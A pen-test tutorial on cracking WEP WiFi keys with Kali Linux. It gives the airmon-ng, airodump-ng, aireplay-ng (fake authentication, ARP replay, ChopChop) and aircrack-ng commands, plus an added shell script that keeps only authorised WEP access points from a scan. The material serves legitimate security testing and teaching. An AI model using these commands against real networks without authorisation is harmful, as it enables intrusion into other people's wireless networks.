WEP WiFi PenTest with Kali Linux

Kali Linux
Start your Kali Linux virtual machine.

Wireless adapter

Plug in your wireless adapter (see Wireless Adapters suitable for WiFi pen-test).

Disconnect
Disconnect from all wireless networks.

Enable monitor mode on wireless interface

List wireless interfaces supporting monitor mode

airmon-ng

Enable monitor mode

airmon-ng start wlan0

Scan for WiFi networks

airodump-ng wlan0mon

Target Network
Spot your target network in the list and note down BSSID, Channel and ESSID.

Packet Capture

airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/ [monitor interface]

-c channel to listen to.
--bssid show only networks matching the given BSSID.
-w the dump file prefix to use
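
Scope check on a saved scan (added example, not part of the original page): it reads the CSV that airodump-ng writes next to the .cap file when -w is used and prints only the access points on the authorised list that still advertise WEP, ready for the findings report. The CSV column layout, the function names and the sample BSSIDs/ESSIDs are assumptions or constructed values.

```shell
#!/bin/sh
# Added example. Assumed airodump-ng CSV layout: 15 comma-separated columns
# per AP row (1 BSSID, 4 channel, 6 Privacy, 14 ESSID, 15 Key), followed by
# a "Station MAC" client section.

# wep_in_scope CSV SCOPE_FILE
#   SCOPE_FILE lists one authorised BSSID per line; '#' starts a comment.
#   Prints "BSSID channel ESSID" for each authorised AP that advertises WEP.
wep_in_scope() {
    awk -F',' '
        function trim(s) { gsub(/^[ \t\r]+|[ \t\r]+$/, "", s); return s }
        # Scope file: remember the authorised BSSIDs, case-insensitively.
        FILENAME == ARGV[1] {
            sub(/#.*/, ""); b = toupper(trim($0))
            if (b != "") scope[b] = 1
            next
        }
        # CSV: stop at the client section; skip the header and short lines.
        trim($1) == "Station MAC" { exit }
        trim($1) == "BSSID" || NF < 15 { next }
        {
            bssid = toupper(trim($1))
            essid = $14                  # an ESSID may itself contain commas
            for (i = 15; i < NF; i++) essid = essid "," $i
            if ((bssid in scope) && index(" " trim($6) " ", " WEP "))
                print bssid, trim($4), trim(essid)
        }
    ' "$2" "$1"
}

# Constructed sample data (hypothetical BSSIDs and ESSIDs).
demo_wep_in_scope() {
    d=$(mktemp -d)
    printf '%s\n' '# authorised test scope' '00:11:22:33:44:55' \
        '66:77:88:99:aa:bb' > "$d/scope.txt"
    cat > "$d/scan-01.csv" <<'EOF'

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WEP , WEP,    , -40,  10,  0,   0.  0.  0.  0,   7, lab-wep, 
66:77:88:99:AA:BB, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11,  54, WPA2, CCMP, PSK, -50,  20,  0,   0.  0.  0.  0,   8, lab-wpa2, 
CC:DD:EE:FF:00:11, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  1,  54, WEP , WEP,    , -70,   5,  0,   0.  0.  0.  0,   8, neighbor, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
EOF
    wep_in_scope "$d/scan-01.csv" "$d/scope.txt"
    rm -rf "$d"
}

demo_wep_in_scope
```

Only the first sample row is reported: the second is in scope but uses WPA2, and the third uses WEP but is not on the authorised list.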

Speed up IV collection
Leave airodump-ng running.

Fake authentication attack
Open a new terminal window:

aireplay-ng -1 0 -e [essid] -a [bssid] [monitor interface]

-1 0 fake authentication with a 0-second reassociation delay
-e access point router’s ESSID
-a access point router’s BSSID

or for picky access points:

aireplay-ng -1 5000 -o 1 -q 10 -e [essid] -a [bssid] [monitor interface]

-o number of packets to send for every authentication and association attempt.
-q time between keep-alive packets.

ARP request reply attack
Open a new terminal window:

aireplay-ng -3 -b [bssid] [monitor interface]

ChopChop attack
Open a new terminal window:

aireplay-ng -4 -b [bssid] [monitor interface]

Crack/obtain the WEP key

aircrack-ng -a1 -b [router bssid] /root/Desktop/*.cap

-a attack mode, 1 for WEP, 2 for WPA/WPA2
-b access point router’s BSSID